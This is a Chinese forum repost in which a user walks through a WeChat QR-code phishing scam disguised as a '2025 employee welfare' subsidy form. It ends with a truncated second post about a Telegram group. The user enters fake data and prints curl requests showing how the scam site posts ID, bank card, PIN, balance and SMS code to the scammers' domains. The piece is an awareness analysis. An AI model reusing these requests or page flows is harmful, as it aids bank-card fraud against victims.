信息来源L站
第一个文章
站内搜了一下,有佬友发了被盗号的帖子,她单位的财务估计就是这么中招的。
昨晚老婆给我看一个打开的网页,内容是“2025年度员工福利申请服务”的申请单,我一看能领不少钱。
因为她这个二维码是财务在微信群里发的,可信度很高,而且微信网页加载完成后的域名变得好小,只关注页面内容没注意看域名,所以没察觉到不对劲。她就开始输入姓名、身份证等信息,正在输入的时候她突然跟我说群里有人反馈被扣钱了!我再扫二维码加载的时候看头部域名发现不对劲,是个超长的美国二级域名。还好我老婆输入信息慢,不然就凭她这个脑容量肯定被骗了!
今天到公司后她给我发了个单位群里的截图,说是让销卡、手机恢复出厂设置!我靠,现在有通过扫个二维码就把人搞得倾家荡产的技术嘛?我坚信只要不主动输入敏感信息和银行卡密码是不可能被骗的,所以让她别销卡也别恢复出厂设置,她还不信我。带着学习的心态看看这到底是个怎样的骗术(也是为了让她放心),开干!
收到的消息图片是这样的:
通过草料网识别这个二维码的内容是(果然 PHP 是世界上最好的语言!):
1、访问后内容为:
2、点击提交信息进入姓名和身份证输入页,在线生成一个假信息填入:
3、下一步让输入银行卡号和手机号,再生成一个假的信息填入:
提交的 CURL 大致如下:
curl 'https://admin.tlmyaemx.icu/submit.php' \
-H 'origin: https://opgyf.icu' \
--data-raw 'id=&member=admin555&username=%E5%BC%A0%E4%B8%89%E4%B8%B0&password=21010620250312133X&captcha_denglu=6226194460188382&captcha_sfshouji=15007673452'
4、提交后让输银行卡密码,到这步还没发现异常的话就有点蠢了,给你发钱还要你密码干啥!而且这他娘的密码还是明文展示的。不管咱们愿意上套,提交!
CURL 大致如下:
curl 'https://admin.tlmyaemx.icu/get-ayment.php?user=uugcNr&username=' \
-H 'origin: https://opgyf.icu' \
--data-raw 'ayment=111111&id=2082'
5、到这一步就更搞笑了,还让你自己输入余额!好让骗子足额取款!不管,咱输入一个让骗子心动的金额。
CURL 大致如下:
curl 'https://admin.tlmyaemx.icu/get-code.php?user=OnQXpQ&username=null' \
-H 'origin: https://opgyf.icu' \
--data-raw 'code=9768267383.66&id=2082'
6、呦!补贴 3750.00 元,到这个界面申请人心里肯定很开心吧。
7、这个时候被骗的人收到了这样的验证码,稍微看一下验证码内容就会起疑心的……
原理应该是利用输入的银行卡绑定了 Apple Pay,然后往骗子的账户转输入过的余额:
8、输入验证码!这是最后一道关卡!在这输入了就成功被骗了!没事,咱愿意被骗,提交!
9、好家伙,骗一张卡不够还要骗另一张卡!贪得无厌啊!!!
分析下来看骗子并没有用什么黑科技给你种植木马,就是通过简单的页面下套让你主动输入银行卡密码和验证码等信息从卡里扣钱。其实其中几个步骤粗心地想想都能发现疑点不至于被骗,特别是输入银行卡密码、输入余额这两步,给你发钱怎么还要你的密码……
不过以后大家遇到涉及到金钱的网页还是得多留个心眼,看看域名,特别是输入密码和验证码的时候!
然后她说我想骗他钱![]()
话说骗子是怎么知道他盗的是财务微信号?
第二个文章
然后那个群里不能发言,希望各位警惕,然后我通过链接找到了tg群,

















‘’